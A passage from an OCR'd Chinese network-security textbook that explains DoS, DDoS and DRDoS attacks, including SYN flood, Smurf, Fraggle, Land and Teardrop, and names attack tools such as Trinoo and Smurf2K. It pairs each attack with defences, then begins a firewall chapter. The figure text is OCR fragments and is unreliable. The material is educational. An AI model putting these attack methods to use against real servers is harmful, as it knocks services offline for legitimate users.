影响 ,而且 也 能 被 利用 来 做 DoS 攻击 。 

要 对 服务 器 实施 拒绝 服务 攻击 ,实质 上 有 以 下 两 种 方式 。 

。 迫使 服务 器 的 缓冲 区 满 ,不 能 接收 新 的 请 求 。 

。 使 用 IP 欺骗 ,迫使 服务 器 把 合法 用 户 的 连接 复位 ,影响 合法 用 户 的 连接 。 


11.43 “拒绝 服务 ?如何 实现 攻击 


“拒绝 服务 ”的 主要 攻击 方式 是 传送 大 量 要 求 确认 的 信息 到 服务 器 ,使 服务 器 里 充斥 着 
这 种 无 用 的 信息 。 

其 中 所 有 的 信息 都 包含 需要 回复 的 虚假 地 址 ,以 至 于 当 服务 器 试图 回 传 时 , 却 无 法 找到 
用 户 。 服 务 器 于 是 暂时 等 候 , 等 超过 一 分 钟 , 然 后 服务 器 再 切断 连接 。 服 务 器 切断 连接 时 ， 
黑客 会 再 度 传送 新 一 批 需要 确认 的 信息 ,这 个 过 程 周 而 复 始 ,最 终 导致 服务 器 瘫痪 。 

在 DoS 攻击 方法 中 ,可 以 分 为 下 列 几 种 具体 的 实现 方法 ,如 TCP SYN Flooding、Smurf 
和 Fraggle 等 。 


1. SYN Flood 


SYN Flood 是 当前 最 流行 的 DoS( 拒 绝 服务 攻击 ) 与 DDoS( 分 布 式 拒绝 服务 攻击 ) 的 方 
式 之 一 ,这 是 一 种 利用 TCP 协议 缺陷 ,发 送 大 量 伪造 的 TCP 连接 请 求 ,从 而 使 得 被 攻击 方 
资源 耗 尽 (CPU 满 负 荷 或 内 存 不 足 ) 的 攻击 方式 。 
由 于 TCP 协议 连接 三 次 握手 的 需要 ,在 每 个 TCP 建立 连接 时 ,都 要 发 送 一 个 带 SYN 标 
记 的 数据 包 , 如 果 在 服务 器 端 发 送 应 答 包 后 ,客户 端 不 发 出 确认 ,服务 器 会 等 待 到 数据 超时 ， 
如 果 大 量 的 带 SYN 标记 的 数据 包 发 到 服务 器 端 后 都 没有 应 答 ,会 使 服务 器 端的 TCP 资源 
迅速 枯竭 ,这 里 主要 是 指 服务 器 的 连接 缓冲 区 队列 的 枯竭 。 导 致 正常 的 连接 不 能 进入 ,甚至 
会 导致 服务 器 的 系统 崩溃 ,这 就 是 TCP SYN Flooding 攻击 的 过 程 。TCP SYN Flood 攻击 
是 由 受 控制 的 大 量 客户 发 出 TCP 请 求 但 不 做 回复 ,使 服务 器 资源 被 占用 ,再 也 无 法 正常 为 
用 户 服务 。 服 务 器 要 等 待 超时 (time out) 才 能 断 开 已 分 配 的 资源 。 攻 击 示 意图 如 图 11. 12 
所 示 。 
正常 TCP 请 求 TCP Syn 攻 击 
客户 服务 器 客户 服务 器 
(1) TCP Syn (1) TCP Syn 


-一 


分 配 资源 
pr 分 配 资源 
2) TO 窜 竺 3 
(2) TCP Syn ACK | 等 待 回 复 (2) TCP Syn ACK 等 待 回复 


等 竺 
(3) TCP ACK a SC 
超时 


图 11.12 TCP Syn 攻击 示意 图 
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2. IP 欺骗 DoS 攻击 


这 种 攻击 利用 RST 位 来 实现 。 假 设 现 在 有 一 个 合法 用 户 (1.1.1.1) 已 经 同 服务 器 建立 
了 正常 的 连接 ,攻击 者 构造 攻击 的 TCP 数据 ,伪装 自己 的 全 为 1.1.1.1, 并 向 服务 器 发 送 
一 个 带 有 RST 位 的 TCP 数据 段 ,服务 器 接收 到 这 样 的 数据 后 ,认为 从 1. 1.1. 1 发 送 的 连接 
有 错误 ,就 会 清空 缓冲 区 中 已 建立 好 的 连接 。 这 时 ,如 果 合 法 用 户 1. 1. 1. 1 再 发 送 合法 数 
据 , 服 务 器 就 已 经 没有 这 样 的 连接 了 ,该 用 户 就 必须 重新 开始 建立 连接 。 

攻击 时 ,伪造 大 量 的 IP 地 址 ,向 目标 服务 器 发 送 RST 数据 ,使 服务 器 不 对 合法 用 户 
服务 。 


3. 带宽 DoS 攻击 


如 果 用 户 的 连接 带宽 足够 大 而 服务 器 又 不 是 很 强壮 ,用 户 就 可 以 向 服务 器 发 送 大 量 的 
请 求 ,来 消耗 服务 器 缓冲 区 的 带宽 。 
11.44 ”DDoS 攻击 

DDoS(Distributed Denial of Service, 分 布 式 拒绝 服务 ) 攻 击 是 利用 很 多 台 计 算 机 一 起 
发 动 攻击 。 攻 击 手法 可 能 只 是 简单 的 Ping, 也 可 能 是 SYN Flood 等 手段 ,但 是 由 于 它 调用 


了 很 多 台 计 算 机 ,所 以 规模 很 大 ,攻击 力 更 猛 ,而 且 因为 它 利 用 了 TCP/IP 网 络 协议 的 缺陷 ， 
所 以 很 难 防御 这 种 进攻 ,DDoS 攻击 示意 图 如 图 11. 13 所 示 。 


远程 控制 加 | 


黑客 : TCP SYN 
相距 很 多 | ; 结 点 
Hops | 加 


一 一 二 避 
2 疝 “一 一 国 
[= [LE] 
shy i 受 柳 网 页 服务 器 
TCP SYN 


结 点 E 装 载 Trinoo 软 件 


11.13 Dos 攻击 示意 图 


攻击 者 在 客户 端 操纵 攻击 过 程 。 每 个 主 控 端 (handler) 是 一 台 已 被 入 侵 并 运行 了 特定 
程序 的 系统 主机 。 每 个 主 控 端 主机 能 够 控制 多 个 代理 端 (Agent)。 每 个 代理 端 也 是 一 台 
被 人 侵 并 运行 某 种 特定 程序 的 系统 主机 。 每 个 响应 攻击 命令 的 代理 端 会 向 被 攻击 目标 主机 
发 送 拒绝 服务 攻击 数据 包 。 

为 了 提高 分 布 式 拒绝 服务 攻击 的 成 功率 ,攻击 者 需要 控制 成 百 上 千 的 被 入 侵 主 机 。 这 
些 主机 通常 是 安装 了 Linux 和 Sun 的 计算 机 ,但 这 些 攻 击 工具 也 能 够 移植 到 其 他 平台 上 运 
行 。 这 些 攻 击 工具 入侵 主机 和 安装 程序 的 过 程 都 是 自动 化 的 。 这 个 过 程 可 分 为 以 下 几 个 
步骤 。 
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。 探测 扫描 大 量 主 机 以 寻找 可 入 侵 主 机 目标 。 

。 入 侵 有 安全 漏洞 的 主机 并 获取 控制 权 。 

。 在 每 台 入 侵 主 机 中 安装 攻击 程序 。 

。 利用 已 人 侵 主机 继续 进行 扫描 和 入 侵 。 

由 于 整个 过 程 是 自动 化 的 ,攻击 者 能 够 在 五 秒 钟 内 入 侵 一 台 主 机 并 安装 攻击 工具 。 也 
就 是 说 ,在 短 短 的 一 小 时 内 可 以 人 侵 数 千 台 主机 。 

要 阻止 这 种 进攻 关键 是 网 络 出 口 反 欺骗 过 滤器 的 功能 是 否 强 大 ,也 就 是 说 如 果 用 户 的 
Web 服务 器 收 到 的 数据 包 的 源 IP 地 址 是 伪造 的 , 则 用 户 的 边界 路 由 器 或 防火 墙 必须 能 够 
将 其 丢弃 ,最 快速 的 方法 是 和 ISP 联手 ,通过 丢 包 等 方法 一 起 来 阻挡 这 种 庞大 的 进攻 。 另 外 
针对 DDoS 进攻 是 集中 于 某 一 个 IP 地址 的 特点 ,使 用 移动 IP 地 址 技术 也 是 一 种 不 错 的 选 
择 。 大 多 数 的 DDoS 攻击 代码 是 公开 的 ,通过 分 析 源 代码 也 可 以 根据 其 特点 设计 出 有 效 的 
反击 方法 ,或 者 使 用 工具 检测 这 种 进攻 。 现 在 已 经 出 现 了 名 为 Ngrep 的 工具 , 它 使 用 DNS 
来 跟踪 TFN2K 驻 留 程序 。 


11.5 ”DoS 攻击 软件 介绍 


利用 主机 协议 栈 及 协议 本 身 的 缺陷 造成 的 安全 漏洞 进行 缓冲 区 溢出 攻击 的 案例 越 来 越 
多 ,这 类 攻击 从 Dos 到 DDoS 危害 也 越 来 越 大 ,本 节 结 合 本 章 阑 述 的 协议 基础 知识 ,简要 介 
绍 几 款 DoS 攻击 软件 。 


11.51 死亡 之 ping 


早期 的 ping 之 所 以 能 称 为 死亡 之 ping, 那 是 因为 在 早期 阶段 路 由 器 对 包 的 最 大 尺寸 都 
有 限制 ,很 多 操作 系统 对 TCP/IP 栈 的 实现 在 ICMP 包 上 都 规定 为 64KB, 并 且 在 对 包 的 标 
题 头 进行 读 取 之 后 ,要 根据 该 标题 头 里 包含 的 信息 为 有 效 载 荷 生成 缓冲 区 。 当 产生 畸形 的 
包 ( 加 载 尺寸 超过 64KB 上 限 的 包 ) 时 ,就 会 出 现 内 存 分 配 错 误 , 从 而 导致 TCP/IP 堆栈 骨 
溃 , 使 系统 死机 。 理 论 上 ping 发 出 的 ICMP 数据 包 最 大 为 65507 字 节 ,如 果 超 过 这 个 限度 ， 
就 会 导致 目标 系统 缓冲 区 溢出 ,TCP/IP 堆栈 崩溃 而 死机 。 

Ping 命令 的 一 1 参数 可 以 定制 包 的 大 小 ,一 t 参数 可 以 循环 发 送 无 数 包 , 但 是 仅 有 这 些 
是 不 够 的 ,黑客 们 通常 使 用 自己 的 ping 工具 ,甚至 可 以 调动 众多 肉鸡 进行 分 布 式 攻击 。 
Tosser 是 一 款 很 实用 的 网 络 测试 工具 ,提供 了 ping 和 trace 功能 , 主 界面 如 图 11. 14 所 示 。 

现在 所 有 标准 的 TCP/IP 都 已 经 具备 对 付 超 大 尺寸 包 的 能 力 , 各 种 操作 系统 (Windows 
98 后 的 Windows NT、Linux、UNIX 和 Mac OS) 都 能 抵抗 一 般 的 死亡 之 ping ,并且 大 多 数 
防火 墙 都 能 够 自动 过 滤 这 些 攻击 ,所 以 现在 的 普通 ping 很 难 形成 死亡 之 势 了 。 针 对 ping 
攻击 只 需 利用 路 由 器 和 防火 墙 对 ICMP 进行 有 效 的 筛选 即 可 。 


11.52 Smurf 


Smurf 是 一 种 很 古老 的 DoS 攻击 。 这 种 方法 使 用 了 广播 地 址 ,广播 地 址 的 尾数 通常 为 
0, 如 192. 168.1.0。 在 一 个 有 n 台 计 算 机 的 网 络 中 , 当 其 中 一 台 主 机 向 广播 地 址 发 送 1KB 
大 小 的 ICMP Echo Requst 时 ;那么 它 将 收 到 nKB 大 小 的 ICMP Reply, 如 果 n 足够 大 将 淹 
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N ‘Ping Tosser” by AcidAngel 


IPidomain [ET Bytes [56 
Ping NumberOfPingstosend 


Trace 
~- Random Interval between Pi 
_Begnkeepaive | 0 


11.14 ping of death 


没 该 主机 ,最 终 导致 该 网 络 的 所 有 主机 都 对 此 ICMP Echo Requst 做 出 答复 ,使 网 络 阻塞 ! 
利用 此 攻击 ,假冒 受害 主机 的 IP, 那 么 它 就 会 收 到 应 答 , 形 成 一 次 拒绝 服务 攻击 。Smurf 攻 
击 的 流量 比 死亡 之 Ping 的 流量 高 出 一 两 个 数量 级 ,而 且 更 加 隐蔽 。 

Smurf2K 是 一 个 强大 的 攻击 工具 , 它 通过 一 个 存储 广播 列表 地 址 的 文件 ,记录 下 
Internet 上 可 用 的 主机 ,然后 利用 这 些 主 机 发 起 进攻 。 主 界面 如 图 11. 15 所 示 。 


:Smurf2K: the final solution 
Victin [EE 
Settings Ce |] 
elaylns): [ 100 Size: | 1024 ER 
oad lis 


Found: 2048 cast, 0 cnd 0 cnmt，in broadcast.txt ... 
11.15 Smurf2K 


防止 这 种 攻击 的 方法 是 ,关闭 外 部 路 由 器 或 防火 墙 的 广播 地 址 特性 。 为 了 防止 被 攻击 ， 
在 防火 墙 上 设置 规则 丢弃 ICMP 包 。 


11.53 ” ”Fraggle 攻击 


Fraggle 攻击 与 Smurf 攻击 类 似 ,只 是 利用 UDP 协议 ,虽然 标准 的 端口 是 7, 但 是 大 多 
数 使 用 Fraggle 攻击 的 程序 允许 用 户 指定 其 他 的 端口 。Fraggle 攻击 是 这 样 实现 的 : 攻击 者 
掌握 着 大 量 的 广播 地 址 ,并 向 这 些 地 址 发 送 假冒 的 UDP 包 , 通 常 这 些 包 是 直接 到 目标 主机 
的 7 号 端口 ,也 就 是 Echo 端口 ,而 另 一 些 情况 下 它 却 到 了 Chargen 端口 ,攻击 者 可 以 在 这 
两 个 端口 之 间 制 造 一 个 循环 来 产生 网 络 阻塞 。 

防止 系统 受到 Smurf 和 Fraggle 攻击 的 最 好 方法 是 在 防火 墙 上 过 滤 掉 ICMP 报 文 ,或 
者 在 服务 器 上 禁止 ping, 并 且 只 在 必要 时 才 打 开 ping 服务 。 
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11.54 OOB Nuke 


OOB Nuke( 原 子弹 ) 又 名 Windows Nuke, 是 在 1997 年 5 月 被 发 现 的 ,这 种 攻击 会 导致 
Windows 95/98 蓝屏 ,而且 在 当时 的 IRC 聊天 用 户 中 也 很 流行 。OOB Nuke 攻击 的 实现 是 
由 于 Windows 95/98 不 能 正确 地 处 理 带 外 数据 。 在 TCP 协议 中 提供 了 “紧急 方式 ”, 就 是 
传输 的 一 端 告诉 另 一 端 有 些 具有 某 种 方式 的 “紧急 数据 ?已 经 放 到 普通 的 数据 流 中 ,如 何 处 
理由 接收 方 决定 。 通 过 设置 TCP 首部 中 的 两 个 字段 EC x 
发 出 这 种 通知 ,URG 位 被 设置 为 1, 并 且 一 个 16 位 的 eg 
紧急 指针 被 设置 为 一 个 正 的 偏 移 量 。 某 些 实现 将 TCP ea 
的 紧急 方式 称 之 为 带 外 数据 ,问题 在 于 Windows 95/ [SS 
98 不 知道 如 何 处 理 带 外 数据 。OOB Nuke 一 般 使 用 Er 


PP 一 一 

139 端口 。 这 里 介绍 一 款 Windows Nuke2 工具 , 主 界 和 

面 如 图 11. 16 所 示 。 mson | 
防止 这 种 攻击 的 方法 是 , 打 相关 的 补丁 或 者 将 ES 

Windows 95/98 操作 系统 升级 到 Windows 2000 或 更 

高 版 本 的 操作 系统 。 图 11.16 Windows Nuke2 软件 界面 

11.55 Land 攻击 


Land 攻击 的 原理 比较 简单 , 即 利用 TCP 连接 三 次 握手 中 的 缺陷 ,向 目标 主机 发 送 源 地 
址 与 目标 地 址 相同 的 数据 包 , 造 成 目标 主机 在 解析 Land 包 时 占用 过 多 的 资源 ,从 而 使 网 络 
功能 完全 瘫痪 。Land 攻击 打造 了 一 个 特别 的 SYN 包 , 其 源 地 址 和 目标 地 址 被 设置 成 同一 
个 计算 机 的 地 址 ,这 时 将 导致 该 计算 机 向 它 自 己 的 地 址 发 送 SYN-ACK 消息 ,结果 这 个 地 
址 又 发 回 ACK 消息 并 创建 一 个 空 连接 ,每 个 这 样 的 连接 都 将 保留 直到 超时 。 

Land 攻击 对 Windows 95 很 有 效 ,但 实际 上 很 多 基于 BSD 的 操作 系统 都 有 这 个 漏洞 。 
不 同 的 操作 系统 对 Land 攻击 反应 不 同 ,如 受到 此 类 攻击 的 UNIX 系统 将 产生 崩 浊 ,而 受到 
攻击 的 Windows NT 系统 将 变 得 非常 缓慢 。 

防止 这 种 攻击 的 方法 是 ,打上 最 新 的 相关 的 安全 补丁 ,在 防火 墙 上 进行 相关 配置 ,将 那 
些 在 外 部 接口 上 进入 的 含有 内 部 源 地 址 的 包 过 滤 掉 ,包括 10. 0. 0. 0 网 段 .127. 0. 0. 0 网 段 、 
192. 168. 0.0 网 段 .172. 16. 0.0 到 172. 31. 0. 0 网 段 。 


11.56 Teardrop 攻击 


Teardrop( 泪 滴 ) 攻 击 利用 那些 在 TCP/IP 堆栈 实现 中 信任 IP 碎片 中 的 包 的 标题 头 所 
包含 的 信息 来 实现 攻击 。IP 分 段 含 有 指示 该 分 段 所 包含 的 原 包 的 那 一 段 的 信息 , 某 些 
TCP/IP 在 收 到 含有 重 县 偏 移 的 伪造 分 段 时 将 崩溃 。 具 体 的 讲 , 物 理 层 通 常 给 所 能 传输 的 
帧 加 上 一 个 尺寸 上 限 ,IP 层 将 数据 报 的 大 小 与 物理 层 帧 的 上 限 相 比较 ,如 果 需 要 就 进行 分 
段 。 在 IP 报 头 中 设置 了 一 些 域 用 于 分 段 : 标志 域 为 发 送 者 传输 的 每 一 个 报 文 保留 一 个 独 
立 的 值 ,这 个 特定 的 值 被 复制 到 每 个 特定 报 文 的 每 个 分 段 ,标志 域 中 有 一 位 作为 “更 多 分 段 ” 
位 ,除了 最 后 一 段 外 ,该 位 在 组 成 一 个 数据 报 的 所 有 分 段 中 被 置 位 ; 分 段 偏 移 域 含有 该 分 段 
自 初始 数据 报 开始 位 置 的 位 移 。 对 于 存在 Teardrop 漏洞 的 操作 系统 ,如 果 接 收 到 畸形 数据 
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分 段 , 则 在 某 些 情况 下 会 破坏 整个 IP 协议 栈 ,因此 必须 重启 计算 机 才能 恢复 。 

在 早期 的 由 BSD 实现 的 网 络 协 议 中 ,在 处 理 数 据 包 分 段 时 存在 漏洞 ,后 来 的 一 些 操作 
系统 都 沿用 了 BSD 的 代码 ,所 以 这 个 漏洞 在 Linux, Windows 98 和 Windows NT 中 都 是 存 
在 的 。 

防止 这 种 攻击 的 方法 是 ,安装 最 新 的 服务 包 , 设 置 防火 墙 时 对 分 段 进行 重组 ,而 不 是 
转发 。 

11.57 UDP Flood 


先 介绍 一 下 Chargen 服务 ,RFC0864 中 定义 了 这 种 服务 ,其 UDP/TCP 均 使 用 了 19 号 
端口 。UDP Chargen Server 若 收 到 一 个 包 ,就 回 一 个 包 回 去 ; 而 TCP Chargen Server 若 发 
现 与 客户 端的 连 线 存在 ,就 会 不 断 的 发 送 包 给 客户 端 , 所 以 TCP Chargen 可 以 直接 诱发 
DoS 攻击 。 不 过 常用 的 还 是 UDP Chargen, 它 常 被 用 来 放大 DDoS 中 的 网 络 流量 ,一 般 要 
结合 Echo 服务 。 

Echo 服务 用 的 是 UDP 的 7 号 端口 ,如 果 它 收 到 一 个 包 , 就 会 把 包 中 的 负载 按 原 样 返 
回 ,而 如 果 攻 击 者 向 UDP 的 19 号 端口 Chargen 发 送 一 个 任意 字符 , 它 将 返回 一 个 假 的 随机 
字符 串 。UDP Flood 攻击 通过 伪造 与 某 一 台 主 机 的 Chargen 服务 之 间 的 UDP 连接 ,回复 
地 址 指向 开 着 Echo 服务 的 一 台 主 机 ,这 就 能 在 两 台 主机 之 间 产 生 无 用 的 数据 流 , 如 果 数 据 
流 足 够 多 就 会 导致 DoS。UDP Flood 攻击 示意 图 如 图 11. 17 所 示 。 


黑客 


图 11.17 UDP Flood 攻击 示意 图 


这 里 介绍 一 个 典型 的 UDP Flood 攻击 工具 即 UDP Flooder, 程 序 主 界面 如 图 11. 18 
所 示 。 


UDP Flooder 2.00 Ex] 


[目标 ] 一 一 一 一 一 一 一 
Pn Uaol 


[ 传输 控制 ] 
景 大 响应 时 间 七 } 最 大 包 : 
最 大 


最 小 
速度 包 / 秒 上 一 一 一 
1 1 


Modem -一 一 Cable 一 一 T1 一 一 LAN 


[数据] 一 
随机 「 到 字 节 
回 文 后 [一 UDP 洪水 ,服务 器 压力 测试 “~ 
C 来 自 文件 
状态 
发 关 的 包 


己 用 时 间 0 


图 11.18 UDP Flood 原理 图 
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防止 这 种 攻击 的 方法 是 , 关 掉 一 些 不 必要 的 TCP/IP 服务 ,或 者 对 防火 墙 进行 配置 , 阻 
断 来 自 Internet 的 请 求 这 些 服务 的 UDP 请 求 。 


11.58 分 布 式 反射 拒绝 服务 


分 布 式 反射 拒绝 服务 (Distributed Reflection Denial of Service, DRDoS) 不 同 于 以 往 的 
拒绝 服务 方式 , 它 对 DDoS 做 了 改进 , 它 通过 对 正常 的 服务 器 进行 网 络 连接 请 求 来 达到 攻击 
目的 。 在 TCP 的 三 次 握手 中 任何 合法 的 TCP 连接 请 求 都 会 收 到 返回 数据 包 , 而 这 种 攻击 
方法 就 是 将 这 个 返回 包 直 接 返回 到 被 攻击 的 主机 上 ,其 原理 就 是 利用 数据 包 的 IP 地 址 欺骗 
方法 ,欺骗 被 利用 的 网 络 服务 器 提供 TCP 服务 ,让 此 服务 器 认为 TCP 请 求 连接 都 是 被 攻击 
主机 发 送 的 ,接着 它 就 会 发 送 “SYN 十 ACK” 数 据 包 给 被 攻击 主机 ,恶意 的 数据 包 就 从 被 利用 
的 服务 器 “反射 "到 了 被 攻击 主机 上 ,形成 洪水 攻击 。DRDoS 攻击 示意 图 如 图 11. 19 所 示 。 


源 IP 地 址 = 被 攻击 者 地 址 
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图 11.19 DRDoS 攻击 示意 图 
DRDoS 很 好 地 隐蔽 了 攻击 者 的 真实 地 址 ,DRDoS 攻击 体系 如 图 11. 20 所 示 。 防 御 这 
种 攻击 比较 困难 ,用 户 需 要 和 ISP 联手 共同 来 解决 问题 。 


其 骗 与 请 求 
遇 窜 | “也 同 与 请 求 [服务 器 


图 11. 20 DRDoS 攻击 体系 
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. TCP/IP 的 全 称 是 什么 ? 

. 7 层 协议 包含 哪 7 层 ? 4 层 模型 包含 哪 4 层 ? 

. 什么 是 UDP 协议 ? 

. 路 由 器 主要 有 哪 几 项 功能 ? 

.什么 是 拒绝 服务 (DoS) 攻 击 ? 对 服务 器 实施 拒绝 服务 攻击 ,实质 上 的 方式 有 哪 两 种 ? 
. 什么 是 DDoS 攻击 ? 什么 是 DRDoS 攻击 ? 

.【 思 考题 ] 如 何 防护 DoS 和 DDoS 攻击? 
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随 着 网 络 的 发 展 ,网 络 安全 越 来 越 受 到 人 们 的 重视 ,各 种 网 络 隔离 技术 
也 得 到 了 长 足 的 发 展 。 

本 章 要 点 如 下 : 

。 防火 墙 概述 ; 

。 分 布 式 防火 墙 ; 

。 物理 隔离 技术 ; 

。 网 闸 的 应 用 ; 

。 防水 墙 技术 ; 

。 安全 设备 的 市 场 分 析 。 


12.1 防火 墙 概述 


Internet 的 发 展 给 政府 机 构 、 企 事业 单位 的 传统 办 公 模 式 带 来 了 前 所 未 
有 的 变革 。 人 们 正 努 力 利用 Internet 来 提高 办 事 效率 和 市 场 反应 速度 ,以 使 
自己 的 公司 更 具有 竞争 力 。 但 同时 又 要 面 对 Internet 开放 带 来 的 数据 安全 
的 新 挑战 和 新 危险 ,保护 企业 的 机 密 信 息 不 受 黑客 和 商业 间谍 的 人 侵 。 

防火 墙 技术 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 
性 安全 技术 , 它 被 越 来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 中 。 


1211 什么 是 防火 墙 


对 “防火 墙 ”这 个 术语 的 理解 可 以 参考 应 用 在 建筑 结构 里 的 安全 技术 。 
一 且 某 个 单元 起 火 它 可 以 起 到 分 隔 作 用 ,保护 其 他 的 居住 者 。 

在 网 络 中 ,所 谓 “ 防 火 墙 ”, 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Internet) 
分 开 的 方法 , 它 实际 上 是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 进 行 通信 时 执 
行 的 一 种 访问 控制 尺度 , 它 被 用 来 保护 计算 机 网 络 免 受 非 授权 人 员 的 骚扰 ， 
防止 黑客 的 入 侵 。 防 火 墙 犹 如 一 道 护 栏 隔 在 被 保护 的 内 部 网 与 不 安全 的 非 
信任 网 络 之 间 。 换 句 话 说 ,如 果 不 通过 防火 墙 , 内 部 网 中 的 人 就 无 法 访问 
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Internet,Internet 上 的 人 也 无 法 和 内 部 网 中 的 人 进行 通信 。 

防火 墙 是 设置 在 不 同 网 络 ( 如 可 信任 的 企业 内 部 网 和 不 可 信 的 公共 网 ) 或 网 络 安全 域 之 
间 的 一 系列 部 件 的 组 合 。 它 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 交 流 的 唯一 出 人 口 ,而 且 它 
能 根据 企业 的 安全 政策 (人 允许、 拒绝 ,监测 ) 控 制 出 人 网 络 的 信息 流 , 它 本 身 具 有 较 强 的 抗 攻 
击 能 力 。 它 是 提供 信息 安全 服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 

在 逻辑 上 ,防火 墙 是 一 个 分 离 器 ,一 个 限制 器 , 它 有 效 地 监控 了 内 部 网 和 Internet 之 间 
的 所 有 活动 ,保证 了 内 部 网 络 的 安全 。 

以 前 的 防火 墙 是 一 个 单独 的 计算 机 , 它 被 放置 在 私有 网 络 和 公 网 之 间 。 近 年 来 ,防火 墙 
机 制 已 发 展 到 不 仅仅 是 “FireWall Box”, 更 是 堡垒 主 机 。 它 涉及 到 从 内 部 网 络 到 外 部 网 络 
的 整个 区 域 , 并 由 一 系列 复杂 的 计算 机 和 程序 组 成 。 如 今 的 防火 墙 更 多 的 是 多 组 件 多 服务 
的 组 合 。 如 果 用 户 准备 安装 防火 墙 , 需 要 知道 自己 需要 什么 样 的 服务 ,以 及 什么 样 的 服务 对 
于 内 部 用 户 和 外 部 用 户 都 是 有 效 的 。 


12.12 防火 墙 的 发 展 


自从 1986 年 美国 Digital 公司 在 Internet 上 安装 了 全 球 第 一 个 商用 防火 墙 系统 并 提出 
了 防火 墙 的 概念 后 ,直到 现在 ,防火 墙 技术 已 经 得 到 了 飞速 的 发 展 。 目 前 有 几 十 家 公司 推出 
了 功能 不 同 的 防火 墙 系统 产品 。 第 一 代 防 火 墙 ,又 称 包 过 滤 防 火 墙 , 它 主 要 通过 数据 包 源 地 
址 .目的 地 址 .端口 号 等 参数 来 决定 是 否 允 许 该 数据 包 通 过 ,并 对 其 进行 转发 ,但 这 种 防火 墙 
很 难 抵御 IP 地 址 欺骗 等 攻击 ,而 且 审计 功能 比较 欠缺 。 

第 二 代 防 火 墙 , 也 称 代 理 服务 器 , 它 用 来 提供 网 络 服务 级 的 控制 ,起 到 外 部 网 络 向 被 保 
护 的 内 部 网 络 申请 服务 时 中 间 转 接 的 作用 ,这 种 防火 墙 可 以 有 效 地 防止 对 内 部 网 络 的 直接 
攻击 ,安全 性 较 高 。 

第 三 代 防火 墙 有 效 地 提高 了 防火 墙 的 安全 性 , 称 为 状态 监控 功能 防火 墙 , 它 可 以 对 每 一 
层 的 数据 包 进 行 检测 和 监控 。 

随 着 网 络 攻击 手段 和 信息 安全 技术 的 发 展 ,新 一 代 功 能 更 强大 ,安全 性 更 强 的 防火 墙 已 
经 问世 ,这 个 阶段 的 防火 墙 已 超出 了 传统 意义 上 防火 墙 的 范畴 ,演变 成 一 个 全 方位 的 安全 技 
术 集 成 系统 , 称 为 第 四 代 防 火 墙 , 它 可 以 抵御 目前 常见 的 网 络 攻 击 手段 ,如 IP 地 址 欺骗 、 特 
洛 伊 木 马 攻 击 、Internet 蠕虫 .口令 探寻 攻击 和 邮件 攻击 等 。 


12.13 防火 墙 能 做 什么 


通常 一 个 防火 墙 具 备 如 下 四 个 功能 , 且 每 个 功能 又 都 不 能 通过 一 个 单独 的 设备 或 软件 
来 实现 。 大 多 数 情况 下 防火 墙 的 四 个 功能 模块 必须 捆绑 在 一 起 使 用 的 。 


1. 防火 墙 是 网 络 安全 的 屏障 


防火 墙 在 一 个 私有 网 络 和 公 网 之 间 建 立 一 个 检查 点 ,并 要 求 所 有 的 流量 都 要 通过 这 个 
检查 点 。 这 样 一 个 检查 点 (或 叫 控制 点 ) 能 极 大 地 提高 内 部 网 络 的 安全 性 ,并 通过 过 滤 不 安 
全 的 服务 而 降低 风险 。 一 旦 这 个 检查 点 建立 ,防火 墙 就 可 以 监视 ,过滤 和 检查 所 有 进出 这 个 
检查 点 的 流量 。 这 个 检查 点 又 被 称 为 阻塞 点 或 网 络 边 界 。 通 过 强制 所 有 进出 流量 都 通过 这 
个 检查 点 ,网 络 管理 员 就 可 以 集中 在 较 少 的 地 方 来 实现 安全 目的 。 如 果 没 有 这 样 一 个 监视 
和 控制 信息 的 点 ,系统 或 网 络 管理 员 则 要 在 大 量 的 地 方 进行 监测 。 
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2. 防火 墙 可 以 强化 网 络 安全 策略 


防火 墙 的 主要 目的 是 强制 执行 用 户 的 安全 策略 。 防 火 墙 能 将 所 有 安全 策略 (如 口令 .加 
密 、 身 份 认证 和 审计 等 ) 集 于 一 身 。 与 将 网 络 安全 问题 分 散 到 各 个 主机 上 相 比 ,防火 墙 的 集 
中 安全 管理 更 经 济 。 


3. 对 网 络 存 取 和 访问 进行 监控 审计 


防火 墙 还 能 够 强制 日 志 记 录 ,并 提供 警报 功能 。 如 果 所 有 的 访问 都 经 过 防火 墙 ,那么 防 
火 墙 就 能 记录 下 这 些 访问 并 做 出 日 志 记 录 , 通 过 防火 墙 上 的 日 志 , 网 络 管理 员 可 以 监视 所 有 
外 部 网 或 互联 网 的 访问 。 

好 的 日 志 策 略 是 实现 网 络 安全 的 有 效 工具 之 一 。 当 发 生 可 疑 动 作 时 ,防火 墙 能 进行 报 
警 ,并 提供 网 络 是 否 受到 监测 和 攻击 的 详细 信息 。 另 外 ,使 用 防火 墙 对 日 志 的 统计 功能 将 有 
利于 对 网 络 的 需求 分 析 和 危险 分 析 。 


4. 防止 内 部 信息 的 外 泄 


利用 防火 墙 对 内 部 网 络 进行 划分 ,可 以 实现 内 部 网 络 中 重点 网 段 的 隔离 ,从 而 限制 局 部 
重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 内 部 网 络 中 一 个 不 引 人 注 意 的 细节 可 能 
包含 了 有 关 安 全 的 线索 ,从 而 引起 外 部 攻击 者 的 兴趣 ,甚至 因此 暴露 了 内 部 网 络 的 某 些 安全 
漏洞 。 使 用 防火 墙 就 可 以 隐蔽 那些 会 暴露 内 部 细节 的 漏洞 ,如 Finger、DNS 等 服务 。 


12.14 防火 墙 的 种 类 


防火 墙 可 根据 防范 的 方式 和 侧重 点 的 不 同 而 分 为 很 多 种 类 型 ,但 总 体 上 可 以 按照 数据 
处 理 方法 和 网 络 结构 进行 分 类 。 


1. 按 数据 处 理 方法 进行 分 类 


按照 防火 墙 对 来 往 数据 的 处 理 方法 ,大 致 可 以 将 防火 墙 分 为 两 大 体系 : 包 过 滤 防 火 墙 
和 代理 防火 墙 ( 应 用 层 网 关 防 火 墙 ) 。 前 者 以 以 色 列 的 CheckPoint 防火 墙 和 Cisco 公司 的 
PIX 防火 墙 为 代表 ,后 者 以 美国 NAI 公 司 的 Gauntlet 防火 墙 为 代表 。 

Qa 分 组 过 滤 (Packet Filtering) : 作用 在 网 络 层 和 传输 层 , 它 根据 分 组 报头 源 地 址 、 目 的 
